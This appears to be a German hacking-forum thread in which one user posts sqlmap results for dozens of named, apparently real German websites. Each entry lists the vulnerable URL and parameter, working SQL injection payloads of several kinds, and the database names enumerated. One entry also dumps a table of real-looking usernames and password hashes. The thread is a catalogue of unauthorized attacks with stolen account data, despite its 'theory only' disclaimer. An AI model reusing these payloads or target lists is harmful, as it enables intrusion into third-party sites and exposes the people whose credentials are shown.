Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLI] Random Sites

- - - - -

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert
http://www.giro-young-cup.de/index.php?main_page=pcs_tags&tags_id=753

Parameter: tags_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: main_page=pcs_tags&tags_id=-8520 OR (7725=7725)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: main_page=pcs_tags&tags_id=753 AND (SELECT 3644 FROM(SELECT COUNT(*),CONCAT(0x71767a7671,(SELECT (CASE WHEN (3644=3644) THEN 1 ELSE 0 END)),0x717a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: main_page=pcs_tags&tags_id=-6419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71767a7671,0x48726562504554514b62,0x717a706271),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: main_page=pcs_tags&tags_id=753 AND SLEEP(5)
---
web application technology: PHP 5.3.22, Apache 2.2.24
back-end DBMS: MySQL 5.0
available databases [2]:
[*] gycjwpoi_ungcua
[*] information_schema

 

http://www.gluecksspielsucht-nrw.de/aktuelles.php?nid=3886&cmd=newsdetail

Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=3886' AND 8478=8478 AND 'Nijy'='Nijy&cmd=newsdetail

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: nid=3886' AND (SELECT 7845 FROM(SELECT COUNT(*),CONCAT(0x71627a7071,(SELECT (CASE WHEN (7845=7845) THEN 1 ELSE 0 END)),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gWMf'='gWMf&cmd=newsdetail

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: nid=-5999' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a7071,0x6e6243654b6d49665171,0x7171787a71),NULL,NULL,NULL,NULL#&cmd=newsdetail

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: nid=3886' AND SLEEP(5) AND 'kBYP'='kBYP&cmd=newsdetail
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db11034978-1
[*] information_schema

http://www.fondspower.de/espresso/pagimail.php?messid=4

Parameter: messid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: messid=4' AND 6490=6490 AND 'tWXB'='tWXB

    Type: UNION query
    Title: MySQL UNION query (NULL) - 31 columns
    Payload: messid=-7226' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b7a7171,0x76676746535a664f504f,0x716a787671),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: messid=4' AND SLEEP(5) AND 'uksz'='uksz
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] db357631853
[*] information_schema

http://www.api.de/div/hitcountv5.php?id=137&db=headlinebanner

Parameter: db (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=137&db=headlinebanner WHERE 4847=4847 AND (SELECT 8204 FROM(SELECT COUNT(*),CONCAT(0x71767a7671,(SELECT (CASE WHEN (8204=8204) THEN 1 ELSE 0 END)),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=137&db=headlinebanner WHERE 3787=3787 AND SLEEP(5)--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: MySQL 5.0
available databases [400]:


Alle Angaben und Informationen dienen lediglich der Theorie!

#2
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert
http://www.stephan.de/php/de_bk.php?amnu=&userid=293f51c00d1ef0f20d0160946fe7793c&nurb=N&firsttime=BOF&limitfrom=0&total=81&neuh=N&l=176&w=0

Parameter: w (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: amnu=&userid=293f51c00d1ef0f20d0160946fe7793c&nurb=N&firsttime=BOF&limitfrom=0&total=81&neuh=N&l=176&w=-8792' OR (7537=7537) AND 'HYif'='HYif

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: amnu=&userid=293f51c00d1ef0f20d0160946fe7793c&nurb=N&firsttime=BOF&limitfrom=0&total=81&neuh=N&l=176&w=0' AND EXTRACTVALUE(9921,CONCAT(0x5c,0x7178767071,(SELECT (CASE WHEN (9921=9921) THEN 1 ELSE 0 END)),0x7170627071)) AND 'LVKp'='LVKp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: amnu=&userid=293f51c00d1ef0f20d0160946fe7793c&nurb=N&firsttime=BOF&limitfrom=0&total=81&neuh=N&l=176&w=0' UNION ALL SELECT CONCAT(0x7178767071,0x4d6d427a5545664a7052,0x7170627071)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: amnu=&userid=293f51c00d1ef0f20d0160946fe7793c&nurb=N&firsttime=BOF&limitfrom=0&total=81&neuh=N&l=176&w=-6109' OR 7536=SLEEP(5) AND 'NRyD'='NRyD
---
web application technology: Apache, PHP 5.4.20
back-end DBMS: MySQL 5.1
Database: stephan_db1
[7 tables]
+-------------+
| HINWEISE    |
| NEWSUSER    |
| ONLINE      |
| SHOPUSER    |
| SHOPUSERDEL |
| STANDVOM    |
| WARENKORB   |
+-------------+

http://www.bildbau.de/projektdetails.php?bildbau-projekt=PACE_Paparazzi_Catering_und_Event_GmbH_-_Axel_Springer_AG/bildbau/78

Parameter: bildbau-projekt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bildbau-projekt=PACE_Paparazzi_Catering_und_Event_GmbH_-_Axel_Springer_AG/bildbau/78 AND 1516=1516

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: bildbau-projekt=PACE_Paparazzi_Catering_und_Event_GmbH_-_Axel_Springer_AG/bildbau/78 AND (SELECT 5835 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (CASE WHEN (5835=5835) THEN 1 ELSE 0 END)),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: bildbau-projekt=PACE_Paparazzi_Catering_und_Event_GmbH_-_Axel_Springer_AG/bildbau/78 AND SLEEP(5)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
available databases [2]:
[*] bildbau_2010
[*] information_schema

 

Database: bildbau_2010
Table: bb_user
[5 entries]
+----+------------------+----------------------------------+-----------+
| id | user_name        | password                         | user_type |
+----+------------------+----------------------------------+-----------+
| 1  | frankgolz        | 0e3106e5e31ff20968e26258a5d5218e | <blank>   |
| 2  | franzitornow     | 52014ae749ace67ad939471f4896d894 | <blank>   |
| 3  | Niko             | e3824592430a21f9105af6c0c346d00c | <blank>   |
| 4  | biancaschleicher | 54d443990711071a5eff333f32325ff1 | <blank>   |
| 5  | gregorrackwitz   | cb1d18a95ee1a61c4c3e1efb65a31220 | <blank>   |
+----+------------------+----------------------------------+-----------+

http://www.topfruits.de/html_datasheet.php?products_id=1853

Parameter: products_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: products_id=1853 AND 2518=2518

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: products_id=1853 AND ROW(1538,5997)>(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (CASE WHEN (1538=1538) THEN 1 ELSE 0 END)),0x7178707871,FLOOR(RAND(0)*2))x FROM (SELECT 5138 UNION SELECT 9581 UNION SELECT 1002 UNION SELECT 1414)a GROUP BY x)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: products_id=1853 UNION ALL SELECT CONCAT(0x7178787671,0x757a56786b65504d4e71,0x7178707871)#

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: products_id=1853 AND 6896=BENCHMARK(5000000,MD5(0x6877756d))
---
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 4.1
available databases [1]:
[*] db189261_1

 

 

 

http://www.fox-programm.de/standalone/index.php?movieid=197

Parameter: movieid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: movieid=197 AND 5687=5687-- gZWv

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: movieid=197 AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x71716a7071,(SELECT (CASE WHEN (7988=7988) THEN 1 ELSE 0 END)),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- HmWV

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: movieid=197 AND (SELECT * FROM (SELECT(SLEEP(5)))NWkJ)-- Ddqs
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db233342329
[*] information_schema


Alle Angaben und Informationen dienen lediglich der Theorie!

#3
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert
http://www.ziegler-ueberdachungen.de/ausschreibung.php?REM_cmd=0&REM_ar_id=054.040

Parameter: REM_ar_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REM_cmd=0&REM_ar_id=054.040' AND 2598=2598 AND 'RjZh'='RjZh

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: REM_cmd=0&REM_ar_id=054.040' AND (SELECT 8460 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (CASE WHEN (8460=8460) THEN 1 ELSE 0 END)),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GhBv'='GhBv

    Type: UNION query
    Title: MySQL UNION query (NULL) - 52 columns
    Payload: REM_cmd=0&REM_ar_id=-6847' UNION ALL SELECT 71,71,71,71,71,71,71,71,71,71,CONCAT(0x7178786271,0x484b6b53794d56526e4a,0x7176627a71),71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: REM_cmd=0&REM_ar_id=054.040' AND SLEEP(5) AND 'GqkI'='GqkI
---
web application technology: Apache
back-end DBMS: MySQL 5.0


 

https://www.urano.de/index.php?inhalt=rechenzentrum.rechenzentrum-outsourcing

Parameter: inhalt (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: inhalt=rechenzentrum.rechenzentrum-outsourcing' AND (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (CASE WHEN (3794=3794) THEN 1 ELSE 0 END)),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KRCT'='KRCT

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: inhalt=rechenzentrum.rechenzentrum-outsourcing' AND SLEEP(5) AND 'zYgq'='zYgq
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] web01db1


 

http://www.flirtenstuttgart.de/index.php?rand_get=AoInoL6G&content=fotovoting_topfrauen

Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0' RLIKE (SELECT (CASE WHEN (4362=4362) THEN 0x4d6f7a696c6c612f352e3020285831313b20553b204c696e757820693638363b2064653b2072763a312e392e312e3629204765636b6f2f3230303931323135205562756e74752f392e313020286b61726d6963292046697265666f782f332e352e3620475442372e30 ELSE 0x28 END)) AND 'cTWW'='cTWW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0' AND (SELECT 2334 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (CASE WHEN (2334=2334) THEN 1 ELSE 0 END)),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'usDD'='usDD
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] usr_web3_1


 

http://www.datebydate.de/events/galerie.php?event_id=1000000168

Parameter: event_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_id=1000000168' AND 5822=5822 AND 'mNlY'='mNlY
---
web server operating system: Linux Ubuntu
web application technology: Apache, PHP 5.3.2
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] datebydate
[*] information_schema


 

http://kbwhelpdesk.script-ecke.de/index_druck.php?site=digitalbelegung&art=pocket&gebiet=A&servicetyp=TV-P&netz=kabelbw

Parameter: netz (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: site=digitalbelegung&art=pocket&gebiet=A&servicetyp=TV-P&netz=-6471' OR (2357=2357) AND 'IrfQ'='IrfQ

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: site=digitalbelegung&art=pocket&gebiet=A&servicetyp=TV-P&netz=kabelbw' UNION ALL SELECT CONCAT(0x7171627871,0x694c756355797165546c,0x716b7a6271)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: site=digitalbelegung&art=pocket&gebiet=A&servicetyp=TV-P&netz=kabelbw' AND SLEEP(5) AND 'ieLs'='ieLs
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] d0028638
[*] information_schema


 

http://ingkh.de/ingsuche/ingenieur.php?nr=41437

Parameter: nr (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nr=41437 AND 5515=5515

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: nr=41437 UNION ALL SELECT CONCAT(0x71787a7671,0x74716458724570414444,0x716a767071)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: nr=41437 AND (SELECT * FROM (SELECT(SLEEP(5)))FZee)
---
web server operating system: Linux Debian 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] ingenieure


 

http://luftschiffhafen-dresden.de/downloads/download.php?dl_id=68

Parameter: dl_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dl_id=68 AND 8582=8582

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: dl_id=-8884 UNION ALL SELECT NULL,CONCAT(0x7170707871,0x79704a48635a65517a42,0x716a627a71),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: dl_id=68 AND (SELECT * FROM (SELECT(SLEEP(5)))gSuB)
---
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] db116207_18
[*] information_schema


 

http://www.abozentrale.de/praemien/p_praemie.php?r=56131

Parameter: r (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: r=56131' AND 2184=2184 AND 'aaCR'='aaCR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: r=-3441' UNION ALL SELECT CONCAT(0x7176707871,0x574e6e726b4d666b5159,0x71716a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: r=56131' AND (SELECT * FROM (SELECT(SLEEP(5)))gxID) AND 'EBwl'='EBwl
---
web application technology: Apache, PHP 5.4.35
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] db474955122
[*] information_schema


 

http://www.dvd-sucht.de/index.php?ROffset=237

Parameter: ROffset (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: ROffset=237 PROCEDURE ANALYSE(EXTRACTVALUE(7554,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x504f436b))))),1)-- yIzP
---
web application technology: Apache, PHP 5.4.38
back-end DBMS: MySQL 5.0.11
available databases [1]:
[*] A


 

http://www.en.abc-bruns.de/contact.php?asp=52

Parameter: asp (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: asp=52' AND 6016=6016 AND 'BdwU'='BdwU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: asp=52' AND (SELECT 1593 FROM(SELECT COUNT(*),CONCAT(0x717a707171,(SELECT (CASE WHEN (1593=1593) THEN 1 ELSE 0 END)),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SkiO'='SkiO

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: asp=-6569' UNION ALL SELECT CONCAT(0x717a707171,0x776a504c704968454d76,0x716a7a7871),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: asp=52' AND (SELECT * FROM (SELECT(SLEEP(5)))Nyce) AND 'dMkJ'='dMkJ
---
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db60047_107
[*] information_schema


 

http://www.go-lu.de/index.php?tab=Geschaeftsfuehrung&pg=1

Parameter: tab (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tab=Geschaeftsfuehrung WHERE 3490=3490 AND (SELECT 6647 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (CASE WHEN (6647=6647) THEN 1 ELSE 0 END)),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- &pg=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: tab=Geschaeftsfuehrung WHERE 7672=7672 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x6f7270706b756d52506c,0x717a626b71),NULL,NULL,NULL#&pg=1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: tab=Geschaeftsfuehrung WHERE 7294=7294 AND (SELECT * FROM (SELECT(SLEEP(5)))nkZw)-- &pg=1
---
web application technology: Apache, PHP 5.4.35
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db467570906
[*] information_schema


 

http://www.iks-medienarchiv.de/en/aktuelles.php?year=2014

Parameter: year (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: year=2014' AND 6254=6254 AND 'ukFI'='ukFI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year=2014' AND (SELECT 2967 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (CASE WHEN (2967=2967) THEN 1 ELSE 0 END)),0x71716b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Xfjm'='Xfjm

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: year=2014' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71787a7a71,0x4c4c65576d5874726357,0x71716b6b71),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: year=2014' AND (SELECT * FROM (SELECT(SLEEP(5)))imHp) AND 'yLhM'='yLhM
---
web application technology: Apache 2.2.29, PHP 5.5.22
back-end DBMS: MySQL 5.0
available databases [2]:
[*] 32056m21338_1
[*] information_schema


 

http://www.ingah.de/fileadmin/php-scripte/seminarprogramm.php?snr=1015

Parameter: snr (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: snr=1015 AND 5877=5877

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: snr=1015 AND (SELECT * FROM (SELECT(SLEEP(5)))cpCy)
---
web server operating system: Linux Debian 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] usr_web60_1
[*] usr_web60_2


 

http://www.lexani24.de/lib/service/grille_detail.php?grilleid=1

Parameter: grilleid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: grilleid=1 AND 4850=4850

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: grilleid=1 AND (SELECT 6115 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (6115=6115) THEN 1 ELSE 0 END)),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: grilleid=-3314 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170717171,0x7554665669676c736254,0x716a717671)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: grilleid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))KTHj)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] devlexan_site
[*] information_schema


 

http://www.mediafruits.de/photographs/limited-edition-photos/alpine/Entangled.php?id=49

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=49' AND 2837=2837 AND 'lDKn'='lDKn

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=49' AND (SELECT 4137 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (CASE WHEN (4137=4137) THEN 1 ELSE 0 END)),0x716b7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xeqk'='xeqk

    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: id=49' UNION ALL SELECT NULL,CONCAT(0x716a6a7171,0x79447451576269486b58,0x716b7a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=49' AND (SELECT * FROM (SELECT(SLEEP(5)))JHlp) AND 'PBgU'='PBgU
---
web application technology: Apache 2.2.29
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] tweety24_test


 

http://www.mercedes-burmesterpartner.de/ansprechpartner/index.php?i_swelt=1&i_swelt1=4&i_bereich=1&suche=1

Parameter: i_bereich (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: i_swelt=1&i_swelt1=4&i_bereich=1%' AND 6189=6189 AND '%'='&suche=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: i_swelt=1&i_swelt1=4&i_bereich=1%' AND (SELECT 3553 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (CASE WHEN (3553=3553) THEN 1 ELSE 0 END)),0x71717a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&suche=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: i_swelt=1&i_swelt1=4&i_bereich=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x517342756a464f566f43,0x71717a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&suche=1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: i_swelt=1&i_swelt1=4&i_bereich=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))ZhUT) AND '%'='&suche=1
---
web server operating system: Linux SuSE 10.2
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
available databases [5]:
[*] burmester_app
[*] dsc_mehrsprachigkeit
[*] dscburmester
[*] information_schema
[*] test


 

http://www.neverforgetescort.de/city_guide.php?guideIndex=14

Parameter: guideIndex (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: guideIndex=14' AND 4712=4712 AND 'OCGd'='OCGd

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: guideIndex=14' AND (SELECT 8166 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (CASE WHEN (8166=8166) THEN 1 ELSE 0 END)),0x716a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pVdM'='pVdM

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: guideIndex=14' AND (SELECT * FROM (SELECT(SLEEP(5)))PKen) AND 'GEdK'='GEdK
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db11127838-neverforget
[*] information_schema


 

http://www.silbensalon.de/wandtattoo-details.php?products_id=56

Parameter: products_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: products_id=56 AND 6372=6372

    Type: UNION query
    Title: MySQL UNION query (47) - 63 columns
    Payload: products_id=-6499 UNION ALL SELECT 47,CONCAT(0x717a6a6271,0x7478584943744f654974,0x717a717071),47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: products_id=56 AND (SELECT * FROM (SELECT(SLEEP(5)))gHXo)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] xa1165_db1


 

http://www.wobau-roebel.de/index.php?p=aktuellm&n=28&j=2008

Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=aktuellm' AND 4978=4978 AND 'pCXQ'='pCXQ&n=28&j=2008

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
